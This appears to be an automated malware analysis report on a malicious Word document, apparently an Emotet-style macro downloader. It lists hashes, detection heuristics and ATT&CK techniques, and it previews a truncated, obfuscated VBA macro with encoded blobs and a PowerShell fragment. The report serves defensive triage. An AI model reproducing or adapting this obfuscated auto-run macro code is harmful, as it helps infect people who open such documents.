Office (OLE) malware analysis — malicious · dc5d4bdc5dcd9857

MALICIOUS

Office (OLE)

225.0 KB Created: 2018-03-29 04:46:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: 9bd07a9fdbe6c342c70c8bc569f3f23e SHA-1: c0a48a732d81881182d5c4dfa352988d4f57d9ed SHA-256: dc5d4bdc5dcd98570bbaabc25303b99e3c81b6ce3f7d942b1ebed73de1a90951

224 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is configured to auto-execute via the AutoOpen function and uses CreateObject to likely download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature.

Heuristics 8

ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	35049 bytes
SHA-256: `97d0238929ae0d92d875dc85e3d03aab4454d5d57db69028978633ed9505deaa`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 26 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WcmbSWTF" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "zwzhmsDL" Function fcJcLzuJi() On Error Resume Next NHAWw = 13839 / Round(FOYFA) + bVfLNL - CStr(9093) * wNMFP * YaCzjv * fMoRUr * LEZlEO UWQTp = pQtnQ tjhMH = AoMVhd("rtnVA0ADAAMgA2ADQAMAAzAGUAYQA3AGYAMgA2ADYAYwBmADEAYgA3ADUANAA0AGMAYwBjADEAMQBkAGEAYwA2AGIAYwA5ADYAMAA3AGEAOQAyADAANQA1AGIAZQBiAGIANQA3AGIAYQAyAGQAMgBjADUAYgA0%i17", 5, 154) PliLZY = 10275 / Round(vJrutT) + FrnaBA - CStr(46089) * Dmfrd * OSAAn * rjtAMw * YLfWaV jZGNOj = ibZthb hPNtna = 81670 / Round(SCKRUj) + zqiVV - CStr(40835) * qzmRjN * SSVFRH * ilRjIP * RTONw JhCROX = YPGVu twsoQwa = AoMVhd("UJ45BhADIAZAAzADQAZQA1ADQANgBkADcAMwAwADAAYQBiADEANAA5ADUAZQBkAGIAYgAzADUANQBiADIAYwA1AGIAYgBlADEAMAAxADEANABlAGEANgBkAGIAYQA3ADQAYgA0n7", 5, 130) JzkpLD = 54081 / Round(UEQpMF) + YiYEj - CStr(55824) * lPDrt * IOivl * GHhiCK * woclc Sdzli = KzjOU BWJPz = 82803 / Round(HfJWoX) + DTEAGY - CStr(48577) * Soqffa * iMzwcI * YiUlu * wrGiGX aNIuho = DUZUL oiVqnAbbWlS = AoMVhd("nSX9jAGQAZQA5ADcANABkADEAYwBlAGMAMgAzAGYAZABlADAAYwA2ADgANgBiADQAMwBmAoF", 6, 65) dBwYp = 90570 / Round(vvZfV) + pAaiHZ - CStr(14714) * DQEDQn * EDFAZ * GvuhsL * nincZD EcmRvD = ZksVY jHmKf = 666 / Round(Xzjfl) + bHfDm - CStr(38929) * kGiMm * EmOGS * HXNGOz * rIvXiu EzQWqr = laaYZ jBDtfLhCfjw = AoMVhd("oKGC19..250))) ) ))25", 5, 15) JvPJs = 27159 / Round(dzOBRG) + cAojA - CStr(35801) * RGWsPa * WwmhpZ * vsliUL * EjPEk rllrYG = rptRdn KcTbH = 56372 / Round(RjjGo) + qDcko - CStr(18081) * ljOaiU * iszuRB * UVktOO * tJFkm sAXRaD = aaNtsn mOptEUjD = AoMVhd("vjG.((varIABle 'MDr').NaME[3,11,2]-JOin'')(([RUNtiME.InteRopserVICeS.MARShAL]::([runTIMe.InTerOpsERvicES.mArSHal].geTmeMberSCk8Kv", 4, 123) aYlpom = 75703 / Round(irrZv) + saJqv - CStr(48945) * hUfUO * zuHqA * kwUXPv * HWSfaA jhzDD = NWsEGV QICIz = 89066 / Round(DRbaAQ) + BfzNVR - CStr(96389) * AWAMK * fwwFEf * KsMkbh * SViITH pwcBt = wIfIk alWbBhh = AoMVhd("nngAMwA2ADYANQA1ADcAMgA5AGIAOAA3AGMAYQBkADUANAA5AGQANgA3ADIAZgA0AGMAZgA5ADUAMgA0ADcANwA1AGUAYgBjADAAZAA5ADUAZgAyAGUANwBmAGEAYwBhAGIAMABjAMXTV", 3, 135) wYTiUv = 71817 / Round(qnmct) + PAisss - CStr(6047) * pAUDL * oCMEz * lKzrJM * AjBLAI HwdnP = hliSKQ swwhUE = 48226 / Round(tiDrYw) + IcZiCP - CStr(22644) * ZlPhi * TjQuj * cbhjpv * FuRNR ZMKoi = ZjZYwF iJjdvWvN = AoMVhd("0RCYUANwAzADEANAAwADvj", 5, 16) uXaBm = 95011 / Round(HBhuss) + FGiHY - CStr(95791) * EwJsmA * IDCla * Bmftf * ZzYfQ mmTZvQ = IupaR QlSmi = 74115 / Round(zzwiHC) + pXflr - CStr(63180) * IMiMmt * JsbAkD * mtNzKj * vwQtrE dQCrz = IYoZv ismMTMOh = AoMVhd("ArvUAKUJ", 4, 2) zoEWiW = 98782 / Round(CdSlj) + sNQOTv - CStr(77795) * fcYIl * jOFoER * ErZhXr * UAwQLz vIZGzE = IbzakR FPPnn = 43533 / Round(BwSSl) + nNizkX - CStr(16065) * IwTDSA * mjZmS * szWvEa * AZZnc WQpOTn = HzSvk DzkbGK = AoMVhd("RGAOQBkADYAYgBiADMANQA0ADcAYgAwADAANwBkADAAMgBjADgANwBlADcAZAA4ADAANAAxAGYAMgAyAGUAYgAyAGUANABlAGEAMgA2AGUANgA0AGEAZQA0ADcAMwA5AGEANAA2ADkAZgBhAGIAMQBkAGEAZQBhAGIAZQBjADkAYwAzAGQAZgA5ADgAZgA5AGYANwBiAGh48wp", 3, 199) VsPPs = 63083 / Round(DuQMC) + zrtiWf - CStr(50582) * iBwUG * CUviaK * EYkJhG * sbzdM qYNOvQ = zrrTu nbLYCr = 56850 / Round(GSZqQ) + azGjJL - CStr(33074) * fRTMjK * WwMCaw * NNabYH * sGvcjV QpSbJ = wuEqL wXfSh = AoMVhd("@niAMQA5AGMAYQA4AGQAYQBmAGMANwA4ADgAMgAyAGMAYQAxAGYw.dj", 4, 48) dkVMn = 79506 / Round(ilsGhm) + rnKYj - CStr(99328) * oFHubR * wTJkQF * BWuHmC * PXjkoz IjfGL = piOSMX vRPUqw = 46769 / Round(RTUKt) + QiWGA - CStr(53363) * iirbd * pEfRvF * CPrWV * TurUC rwJKo = iXlNnX mrEOWaWXVw = AoMVhd("uREIANABlADkAYwA5AGMANQA0AGYAMgX88C", 4, 28) NWiUlB = 48022 / Round(UzArz) + tINqKp - CStr(7144) * dftrhQ * npcTdI * kaGSdT * wJToz OXWdip = tCatUI PhWcC = 96918 / Round(NtuZz) + KicMA - CStr(91468) * sfSlY * XFZZaj * KWBYo * pCfzrA ZSCjqb = TVjOkE jUFnzLm = AoMVhd("4AGYAZAA1ADMAO ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.